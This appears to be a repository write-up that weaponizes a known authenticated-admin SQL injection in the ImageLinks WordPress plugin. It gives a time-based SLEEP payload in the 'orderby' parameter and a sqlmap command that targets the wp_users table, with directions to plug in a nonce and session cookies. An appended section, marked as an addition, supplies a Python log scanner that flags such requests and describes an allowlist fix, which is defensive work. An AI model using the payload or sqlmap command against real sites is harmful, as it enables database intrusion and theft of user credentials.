https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/imagelinks-interactive-image-builder-lite/imagelinks-154-authenticated-admin-sql-injection

Note

I do not take credit for finding this. I only simply weaponized it, as it was missing technical details on exploitation.

PoC:

```
page=imagelinks&_wpnonce=13e9be524c&_wp_http_referer=/wp-admin/admin.php?page=imagelinks&action=-1&imagelinks_item[0]=2&action2=-1&orderby=title AND (SELECT 2209 FROM (SELECT(SLEEP(5)))GBjd)&order=asc
```

SQLMap:

MAKE SURE TO REPLACE THE NONCE AND ADD COOKIES. YOU MAY NEED TO ENUMERATE DATABASES AS WELL AND PIN TO THE PROPER DATABASE.

```
sqlmap -u 'http://localhost/wp-admin/admin.php?page=imagelinks&_wpnonce=13e9be524c&_wp_http_referer=/wp-admin/admin.php?page=imagelinks&action=-1&imagelinks_item[0]=2&action2=-1&orderby=title&order=asc' -p 'orderby' -D wordpress -T wp_users --cookie='COOKIESHERE'
```
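A defender-side check for the request shape shown above, as an added example that is not part of the original repository: it scans access-log lines for `page=imagelinks` admin requests whose `orderby` is not a bare column identifier or whose `order` is not `asc`/`desc`. The log lines are constructed, the function names are hypothetical, and it assumes the request arrives as a GET (as in the sqlmap command) so the parameters are visible in the access log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request field of a combined-format access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A legitimate sort column is a bare identifier such as "title".
IDENTIFIER_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
SORT_DIRECTIONS = {"asc", "desc"}


def suspicious_sort_params(target):
    """Name the sort parameters of an imagelinks admin request that hold
    anything other than a bare identifier (orderby) or asc/desc (order)."""
    query = parse_qs(urlsplit(target).query)
    if "imagelinks" not in query.get("page", []):
        return []
    bad = []
    if any(not IDENTIFIER_RE.fullmatch(v) for v in query.get("orderby", [])):
        bad.append("orderby")
    if any(v.lower() not in SORT_DIRECTIONS for v in query.get("order", [])):
        bad.append("order")
    return bad


def flag_log_lines(lines):
    """Return (line_number, client_ip, bad_params) for each flagged line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_sort_params(match.group(1))
            if bad:
                findings.append((number, line.split(" ", 1)[0], bad))
    return findings


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=imagelinks&orderby=title&order=asc HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=imagelinks&orderby=title%20AND%20(SELECT%202209%20FROM%20(SELECT(SLEEP(5)))GBjd)&order=asc HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=other&orderby=a%20b HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in flag_log_lines(SAMPLE_LOG):
        print(finding)
```

The same identifier and `asc`/`desc` checks, applied server-side before the value reaches the query, are the allowlist form of the fix for an `ORDER BY` injection.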